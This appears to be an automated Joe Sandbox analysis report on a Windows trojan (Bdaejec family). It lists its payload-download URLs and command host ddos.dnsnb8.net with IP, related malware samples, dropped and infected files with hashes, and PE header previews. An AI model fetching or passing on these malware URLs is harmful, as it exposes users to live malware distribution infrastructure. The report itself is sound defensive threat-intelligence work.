http://ddos.dnsnb8.net:799/cj//k1.rarp	TJytnf.exe, 00000005.00000003.1303493025.000000000145A000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: phishing	unknown
http://www.baanboard.com	SciTE.exe.5.dr	false	URL Reputation: safe	unknown
http://ddos.dnsnb8.net:799/cj//k1.rarbC:	TJytnf.exe, 00000005.00000003.1303493025.000000000147F000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://www.develop.comDeepak	SciTE.exe.5.dr	false	URL Reputation: safe	unknown
http://ddos.dnsnb8.net:799/cj//k1.rar(	TJytnf.exe, 00000005.00000002.1847735199.000000000143E000.00000004.00000020.00020000.00000000.sdmp, TJytnf.exe, 00000005.00000003.1303493025.000000000145A000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://ddos.dnsnb8.net:799/cj//k1.rar%	TJytnf.exe, 00000005.00000003.1303493025.000000000145A000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: phishing	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
44.221.84.105	ddos.dnsnb8.net	United States		14618	AMAZON-AESUS	false

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1480645
Start date and time:	2024-07-24 22:27:24 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 6m 32s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Run name:	Run with higher sleep bypass
Number of analysed new started processes analysed:	23
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	biKy3nZEyJ.exe renamed because original name is a hash value
Original Sample Name:	98DC44E47B06318EBD73414912CD60F5FF71B3FE172476D353B4DDA39C7DC327.exe
Detection:	MAL
Classification:	mal81.spre.troj.evad.winEXE@6/13@1/1
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 56% Number of executed functions: 15 Number of non-executed functions: 28
Cookbook Comments:	Found application associated with file extension: .exe Sleeps bigger than 100000000ms are automatically reduced to 1000ms

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, MoUsoCoreWorker.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 13.89.179.12
Excluded domains from analysis (whitelisted): login.live.com, slscr.update.microsoft.com, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, time.windows.com, onedsblobprdcus17.centralus.cloudapp.azure.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
VT rate limit hit for: biKy3nZEyJ.exe

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
44.221.84.105	9310DAF6D10F4FBFAF390E74BCF1C4D9ACC023D7DB3E26030F8772528572A22A.exe	Get hash	malicious	Bdaejec	Browse	ddos.dnsnb8.net:799/cj//k2.rar
	942b266052cbd8e8b460173ab630e2afa32d1d494cce2f1473f606f8402cb2f8.exe	Get hash	malicious	Bdaejec	Browse	ddos.dnsnb8.net:799/cj//k2.rar
	998D503AA5E68830D7F981490108D44DC12F331BD5AD9EA9F207A99E6D06AFBB.exe	Get hash	malicious	Bdaejec, SmokeLoader	Browse	ddos.dnsnb8.net:799/cj//k5.rar
	95324A18E2A0AA85A2C5CE30681B4C2D9F703415D3C41916F540F24A5088807B.exe	Get hash	malicious	Bdaejec	Browse	ddos.dnsnb8.net:799/cj//k5.rar
	987123[1].exe	Get hash	malicious	Bdaejec, SmokeLoader	Browse	ddos.dnsnb8.net:799/cj//k1.rar
	96ee8edc[1].exe	Get hash	malicious	Bdaejec, SmokeLoader	Browse	ddos.dnsnb8.net:799/cj//k5.rar
	962EA3E84B772C84BC0D9495CC00BF547CA80AC1ED34026CB971B6F5EB9DEEC8.exe	Get hash	malicious	Bdaejec, Oski Stealer, Vidar	Browse	ddos.dnsnb8.net:799/cj//k1.rar
	942b266052cbd8e8b460173ab630e2afa32d1d494cce2f1473f606f8402cb2f8.exe	Get hash	malicious	Bdaejec, Sality	Browse	ddos.dnsnb8.net:799/cj//k3.rar
	95324A18E2A0AA85A2C5CE30681B4C2D9F703415D3C41916F540F24A5088807B.exe	Get hash	malicious	Bdaejec	Browse	ddos.dnsnb8.net:799/cj//k3.rar

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
ddos.dnsnb8.net	9310DAF6D10F4FBFAF390E74BCF1C4D9ACC023D7DB3E26030F8772528572A22A.exe	Get hash	malicious	Bdaejec	Browse	44.221.84.105
	942b266052cbd8e8b460173ab630e2afa32d1d494cce2f1473f606f8402cb2f8.exe	Get hash	malicious	Bdaejec	Browse	44.221.84.105
	998D503AA5E68830D7F981490108D44DC12F331BD5AD9EA9F207A99E6D06AFBB.exe	Get hash	malicious	Bdaejec, SmokeLoader	Browse	44.221.84.105
	95324A18E2A0AA85A2C5CE30681B4C2D9F703415D3C41916F540F24A5088807B.exe	Get hash	malicious	Bdaejec	Browse	44.221.84.105
	987123[1].exe	Get hash	malicious	Bdaejec, SmokeLoader	Browse	44.221.84.105
	96ee8edc[1].exe	Get hash	malicious	Bdaejec, SmokeLoader	Browse	44.221.84.105
	962EA3E84B772C84BC0D9495CC00BF547CA80AC1ED34026CB971B6F5EB9DEEC8.exe	Get hash	malicious	Bdaejec, Oski Stealer, Vidar	Browse	44.221.84.105
	942b266052cbd8e8b460173ab630e2afa32d1d494cce2f1473f606f8402cb2f8.exe	Get hash	malicious	Bdaejec, Sality	Browse	44.221.84.105
	9608e7d593a0671671e3b7e23d1b1fcfe49a5f84da9d2e0c5560d63b091acd83.exe	Get hash	malicious	Bdaejec, GCleaner, Nymaim	Browse	44.221.84.105

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
AMAZON-AESUS	9310DAF6D10F4FBFAF390E74BCF1C4D9ACC023D7DB3E26030F8772528572A22A.exe	Get hash	malicious	Bdaejec	Browse	44.221.84.105
	942b266052cbd8e8b460173ab630e2afa32d1d494cce2f1473f606f8402cb2f8.exe	Get hash	malicious	Bdaejec	Browse	44.221.84.105
	998D503AA5E68830D7F981490108D44DC12F331BD5AD9EA9F207A99E6D06AFBB.exe	Get hash	malicious	Bdaejec, SmokeLoader	Browse	44.221.84.105
	95324A18E2A0AA85A2C5CE30681B4C2D9F703415D3C41916F540F24A5088807B.exe	Get hash	malicious	Bdaejec	Browse	44.221.84.105
	987123[1].exe	Get hash	malicious	Bdaejec, SmokeLoader	Browse	44.221.84.105
	96ee8edc[1].exe	Get hash	malicious	Bdaejec, SmokeLoader	Browse	44.221.84.105
	962EA3E84B772C84BC0D9495CC00BF547CA80AC1ED34026CB971B6F5EB9DEEC8.exe	Get hash	malicious	Bdaejec, Oski Stealer, Vidar	Browse	44.221.84.105
	942b266052cbd8e8b460173ab630e2afa32d1d494cce2f1473f606f8402cb2f8.exe	Get hash	malicious	Bdaejec, Sality	Browse	44.221.84.105
	Transaction record 5445-97660.pdf	Get hash	malicious	HTMLPhisher, Tycoon2FA	Browse	3.227.160.36

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Local\Temp\TJytnf.exe	#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe	Get hash	malicious	Bdaejec, Sality	Browse
	a4#Uff09.exe	Get hash	malicious	Bdaejec, Sality	Browse
	1.0.0.2.exe	Get hash	malicious	Bdaejec, Sality	Browse
	log1.exe	Get hash	malicious	Babadeda, Bdaejec, Neshta	Browse
	log2.exe	Get hash	malicious	Babadeda, Bdaejec, Neshta	Browse
	2.exe	Get hash	malicious	Bdaejec	Browse
	gracNYJFpD.exe	Get hash	malicious	Bdaejec, GhostRat, Nitol, Young Lotus	Browse
	xpKZwKFN9W.exe	Get hash	malicious	Bdaejec	Browse
	LVF7FM9Z4I.exe	Get hash	malicious	Bdaejec	Browse

Created / dropped Files

C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\TJytnf.exe
File Type:	MS-DOS executable PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	19456
Entropy (8bit):	6.590345709749569
Encrypted:	false
SSDEEP:	384:1FlSRXZQaD7U8iu4YsAa7ZA0UvH2lsRv21yW7GbAxur6+Y9PffPz:ovQGPL4vzZq2o9W7GsxBbPr
MD5:	C4DFD2EBC61A0412FC3F2A11D18EE0E0
SHA1:	2F2AD0579273DC9CA80F4DB84D357386D32CB6CF
SHA-256:	FA0CA1AECD1F355F6AF5BF54621B2A1685A74777B13B305E6313246451B6E959
SHA-512:	07FD8802D1DAEC1256A821F6E19299579CBEC4F87CED8354B85EF55084F12DEBDCBBE2A6FBF2CF48EEBB552BA3416BF3F456F59C15EA6A2B5338E0BFEF8C3C24
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	low
Preview:	MZ..........................................................@...PE..L....................................0............................................................................................... ..l...........................................................................................................PELIB...............................`....rsrc........ ......................@..@..Y\|.uR..P...0...B.................. ...................................................................................j.h"...h....j...(....Hello World!.MyProg........................................................................................................................................................................................................................(...........0...(.......................;.......User32.dll...MessageBoxA................................................................................................dummy.exe.....................TestExport.CallPlz................

C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\TJytnf.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2389504
Entropy (8bit):	6.731347051527704
Encrypted:	false
SSDEEP:	49152:BGSXoV72tpV9XE8Wwi1aCvYMdRluS/fYw44RxL:V4OEtwiICvYMpf
MD5:	9EBB63361BCEAA83ED9ABFD842E95B39
SHA1:	46E763A29988F77E4EDE9059FF2132A2A49E0F51
SHA-256:	1C463DD42C56E1E2E37928B12878BAF54FFFC78B49EF00DABCFC115FF4B7C0FC
SHA-512:	ED1465AC862AE80C429814D6E00360B7DC4E9004BA3C27717E00E1623DF8DF9E3D36D11C4819BC54B553F568D7222544E7F70E5ED39E7B47EAD90281445A0C76
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........Ark.Ark.Ark...o.Mrk...h.Jrk...n.^rk...j.Erk.H...Brk.H...nrk.Arj..pk...b.rk...k.@rk.....@rk...i.@rk.RichArk.........................PE..L.....(c.....................~.......p$...........@...........................$...........@.........................p...<............@ ......................P#.....@...p...................P...........@............................................text...e........................... ..`.rdata...^.......`..................@..@.data...`....0......................@....rsrc........@ ....... .............@..@.reloc.......P#......"#.............@..B.....u...P...p$..B...4$............. ...........................................................................................................................................................................................................................................................

C:\Program Files\7-Zip\Uninstall.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\TJytnf.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	31744
Entropy (8bit):	6.366508905276035
Encrypted:	false
SSDEEP:	768:uWQ3655Kv1X/qY1MSdh8QGPL4vzZq2o9W7GsxBbPr:uHqaNrFdhfGCq2iW7z
MD5:	DAA82762959307F04406C76949277F0E
SHA1:	4B436F3048992376CAAE23C534CE6E65CA58647C
SHA-256:	01249BABA041A58CCEAA9642C97C6B0AA2F8F96709DA282C1A374F97D7B852D7
SHA-512:	87FE5F74ECDD9AF90E325558016635783A63B4EE9DF6C232452AE440E8A6566C53343C4A56671F442B8B9DCD7D24EB42C4CFCA1D427D05202ECCFF56BBD11B86
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......S.6...X...X...X.x.R...X..V...X.x.\...X......X...Y.W.X......X.!.R...X...^...X.Rich..X.................PE..L...pN.d........../......V...@.......p.......0....@.........................................................................$9.......`...............................................................................0...............................text............................... ..`.rdata.......0......................@..@.data...X....@.......(..............@....rsrc........`.......*..............@..@.EpN.uZ..P...p...B...:.............. ...................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_TJytnf.exe_bf4cc6b994b3c313b3d8ecc28fe7af8bd1d8_fcda0e7d_16be80c0-2d6f-460e-b66d-89c9b7c0acb9\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.9888504021786939
Encrypted:	false
SSDEEP:	96:VlFPu3jJsmhnc7afzQXIDcQwc6XcEdcw3oYI+HbHg/5ksS/YyNl1zWDUTAH+DOy3:f9ejJi0OT3kYJjk/JFzuiF5Z24IO8gP
MD5:	61F02DB797AC30F2E591AF4812559EC9
SHA1:	0603FD534F9D73B7AFBB21A2E3D729761EF126F8
SHA-256:	B100722E2E5DEA4A8AA72A9E69B4DB8781459423BECB2E9E2BCB74A9E4813683
SHA-512:	81780C7293A4F5D5C8001EF85F16A6FFE16C9B6ABA17BBB888F0C34314EB2CF585255CDB2B46474D5BBA026D500E9ADA49C8A34628B551E066D331A5D66AAC9C
Malicious:	false
Reputation:	low
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.6.6.3.2.6.5.1.1.4.1.5.0.4.3.2.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.6.6.3.2.6.5.1.2.8.2.1.2.9.0.7.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.1.6.b.e.8.0.c.0.-.2.d.6.f.-.4.6.0.e.-.b.6.6.d.-.8.9.c.9.b.7.c.0.a.c.b.9.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.b.2.7.4.1.a.f.3.-.9.5.f.2.-.4.6.c.2.-.a.4.f.6.-.2.2.8.a.e.4.9.5.6.3.d.2.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.T.J.y.t.n.f...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.b.e.4.-.0.0.0.1.-.0.0.1.4.-.b.5.c.7.-.b.6.0.5.0.8.d.e.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.d.b.0.d.5.c.4.5.b.d.c.5.1.c.b.0.5.a.f.e.e.1.8.2.0.9.f.4.8.8.2.5.0.0.0.0.f.f.f.f.!.0.0.0.0.9.9.e.e.3.1.c.d.4.b.0.d.6.a.4.b.6.2.7.7.9.d.a.3.6.e.0.e.e.e.c.d.d.8.0.5.8.9.f.c.!.T.J.y.t.n.f...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.1.3.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER2D88.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 15 streams, Wed Jul 24 20:28:32 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	154494
Entropy (8bit):	1.8707255507294243
Encrypted:	false
SSDEEP:	768:kFVSkMB9phc/DfqeX53Felcf6I0xHxvZ6jkpEf9lv7lu71:Sfpb53R0xZZQkpEf9lv7lu71
MD5:	390D13265A1DA1452B1CEBA4245F813E
SHA1:	E669B17BAEDA935D54773265F609E087CA9EA484
SHA-256:	168ED52C7F702DB5C3EB67822D2D0AE1478A0AD28E76F509BC1E2F071E7C5EAA
SHA-512:	A2BB025FA8E3C89D796E6D1A4009C519A4C5C72123E50B9FA7371EE49F804C7C57D03848389FA45056F77F92417D870CFE4A2CBAF5B2175348C65F3656633489
Malicious:	false
Reputation:	low
Preview:	MDMP..a..... ........c.f............D...............X.......<.... ......4....N..........`.......8...........T...........x=..............8!..........$#..............................................................................eJ.......#......GenuineIntel............T............c.f.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER324B.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	6274
Entropy (8bit):	3.721825334797743
Encrypted:	false
SSDEEP:	96:RSIU6o7wVetbZk6aMUkYmaXz5aMQUM89bW0sfjym:R6l7wVeJZk6ZYmWpDM89bW0sfjym
MD5:	56AA68F49D02FED59A6EB4C0CF210622
SHA1:	59CD1EB92C580AAD101DAD05F108DD915903CB2C
SHA-256:	93BF3F94B72A0E3CD7CE174058E60A9DFF780F9845EC0717125559CBD765126E
SHA-512:	00796FE17D29A50C59E88D1E9A65769155D7CCDAAC72190FFA2D2C59BDDFE583A76570AA8D77EEAF677F5E42F401EC5BD830A6B82D06F3F0D430562F21832877
Malicious:	false
Reputation:	low
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.3.0.4.4.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER326C.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4551
Entropy (8bit):	4.445432678988999
Encrypted:	false
SSDEEP:	48:cvIwWl8zsLJg77aI95uWpW8VYbYm8M4JYgFY+q8qIbPM2gDsJd:uIjflI7nP7V/JgAbxgYJd
MD5:	675A5A821D56C82E3D5E2BF6A2759E80
SHA1:	6DD2C6677F80AA36A48E159071D161F8C6043851
SHA-256:	B67BEFDD846038E22DF3D0E2D1B87FA94A3E5A55A3F89E81A7A0C5C5CAA22E94
SHA-512:	2D3FAEEA12AB53DD37211648D9B225FB0AB4D10A6E79ED6E3AA2A87E3DFBB942EF759982B22C6CC77882680AD7799001C63777AE6C626689E06786F118601B32
Malicious:	false
Reputation:	low
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="425491" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\k1[1].rar

Download File

Process:	C:\Users\user\AppData\Local\Temp\TJytnf.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	4
Entropy (8bit):	1.5
Encrypted:	false
SSDEEP:	3:Nv:9
MD5:	D3B07384D113EDEC49EAA6238AD5FF00
SHA1:	F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
SHA-256:	B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
SHA-512:	0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	foo.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\k2[1].rar

Download File

Process:	C:\Users\user\AppData\Local\Temp\TJytnf.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	4
Entropy (8bit):	1.5
Encrypted:	false
SSDEEP:	3:Nv:9
MD5:	D3B07384D113EDEC49EAA6238AD5FF00
SHA1:	F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
SHA-256:	B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
SHA-512:	0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
Malicious:	false
Preview:	foo.

C:\Users\user\AppData\Local\Temp\27401EC2.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\TJytnf.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	4
Entropy (8bit):	1.5
Encrypted:	false
SSDEEP:	3:Nv:9
MD5:	D3B07384D113EDEC49EAA6238AD5FF00
SHA1:	F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
SHA-256:	B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
SHA-512:	0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
Malicious:	false
Preview:	foo.

C:\Users\user\AppData\Local\Temp\29897C01.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\TJytnf.exe
File Type:	ASCII text
Category:	modified
Size (bytes):	4
Entropy (8bit):	1.5
Encrypted:	false
SSDEEP:	3:Nv:9
MD5:	D3B07384D113EDEC49EAA6238AD5FF00
SHA1:	F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
SHA-256:	B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
SHA-512:	0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
Malicious:	false
Preview:	foo.

C:\Users\user\AppData\Local\Temp\TJytnf.exe

Download File

Process:	C:\Users\user\Desktop\biKy3nZEyJ.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	modified
Size (bytes):	15872
Entropy (8bit):	7.031113762428177
Encrypted:	false
SSDEEP:	384:7XZQaD7U8iu4YsAa7ZA0UvH2lsRv21yW7GbAxur6+Y9PffPz:1QGPL4vzZq2o9W7GsxBbPr
MD5:	56B2C3810DBA2E939A8BB9FA36D3CF96
SHA1:	99EE31CD4B0D6A4B62779DA36E0EEECDD80589FC
SHA-256:	4354970CCC7CD6BB16318F132C34F6A1B3D5C2EA7FF53E1C9271905527F2DB07
SHA-512:	27812A9A034D7BD2CA73B337AE9E0B6DC79C38CFD1A2C6AC9D125D3CC8FA563C401A40D22155811D5054E5BAA8CF8C8E7E03925F25FA856A9BA9DEA708D15B4E
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Joe Sandbox View:	Filename: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, Detection: malicious, Browse Filename: a4#Uff09.exe, Detection: malicious, Browse Filename: 1.0.0.2.exe, Detection: malicious, Browse Filename: log1.exe, Detection: malicious, Browse Filename: log2.exe, Detection: malicious, Browse Filename: 2.exe, Detection: malicious, Browse Filename: gracNYJFpD.exe, Detection: malicious, Browse Filename: xpKZwKFN9W.exe, Detection: malicious, Browse Filename: LVF7FM9Z4I.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......z.I.>.'.>.'.>.'..7\.2.'...(.?.'.>.&.y.'.Q.#.=.'..).?.'.7...6.'.7...?.'.Rich>.'.................PE..L...JG.R.............................`.......0....@.......................................@..................................p...............................o.......................................................................................text.... ..........................`....rdata.......0......................@....data........@......................@....reloc.......P.......(..............@....aspack.. ...`.......,..............`....adata...............>..............@...................................................................................................................................................................................................................................................................................................

C:\Windows\appcompat\Programs\Amcache.hve

Download File

Process:	C:\Users\user\AppData\Local\Temp\TJytnf.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1835008
Entropy (8bit):	4.417070789869389
Encrypted:	false
SSDEEP:	6144:ocifpi6ceLPL9skLmb0moSWSPtaJG8nAgex285i2MMhA20X4WABlGuNZ5+:di58oSWIZBk2MM6AFBzo
MD5:	970C07DB2E2AE1A080F95E9B34E97A7A
SHA1:	2D0C50C9C85938F0F9A37926EB3DC32865BEB71E
SHA-256:	171DB4114CC7AC2A8F8D89A29FFE13ED864F7DFFE6BE396B34B4F2E23F7A9581
SHA-512:	4A1C6BAB1F52DAA841D5E10417A4E5AC1D7A4AC74C7809E699DD9DBC44549B6D8150D6271C8C81E48E66075DC2EBE9A715252CA87AF418617A5B62B5087FDCA1
Malicious:	false
Preview:	regfF...F....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm..................................................................................................................................................................................................................................................................................................................................................@..3........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.46807306180755
TrID:	Win32 Executable (generic) a (10002005/4) 98.81% Windows ActiveX control (116523/4) 1.15% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	biKy3nZEyJ.exe
File size:	3'101'704 bytes
MD5:	6963bb0311ded02ba57657ba4a61d427
SHA1:	777ed3376f2b380fef0658e6b1ab4a90e4dca901
SHA256:	98dc44e47b06318ebd73414912cd60f5ff71b3fe172476d353b4dda39c7dc327
SHA512:	62f7cea98e3d9855333934fad2b5d3d2681109d3e095022b444e6eba284e33dba1502f050cc95adbcbe475bff8fccf2e64b59110504c4f8b23441079bfd90e06
SSDEEP:	49152:WbJ8ShfSifOsD+Q/Hg1Pi+zrEREFo8IEoypFfbVquZLlrlB6ezwA1UCKG+mipmAQ:0haIO2+Q/A1lzrqYo8I2TVquZLF8Cimr
TLSH:	60E590237AF1847AC6630332897D7779A1EDEA701936E283679C1F2D1D701D35A386A3
File Content Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......4...p...p...p....e0.q...}...$...}. ._...}.......6...1...p...i....e1.}....e/.r....e4.S...p...{...s...u...}.$.q...p.h.q...s.!.q..

File Icon


Icon Hash:	03d4c69ec892d0cc

Static PE Info

General

Entrypoint:	0x740000
Entrypoint Section:	A#uq
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
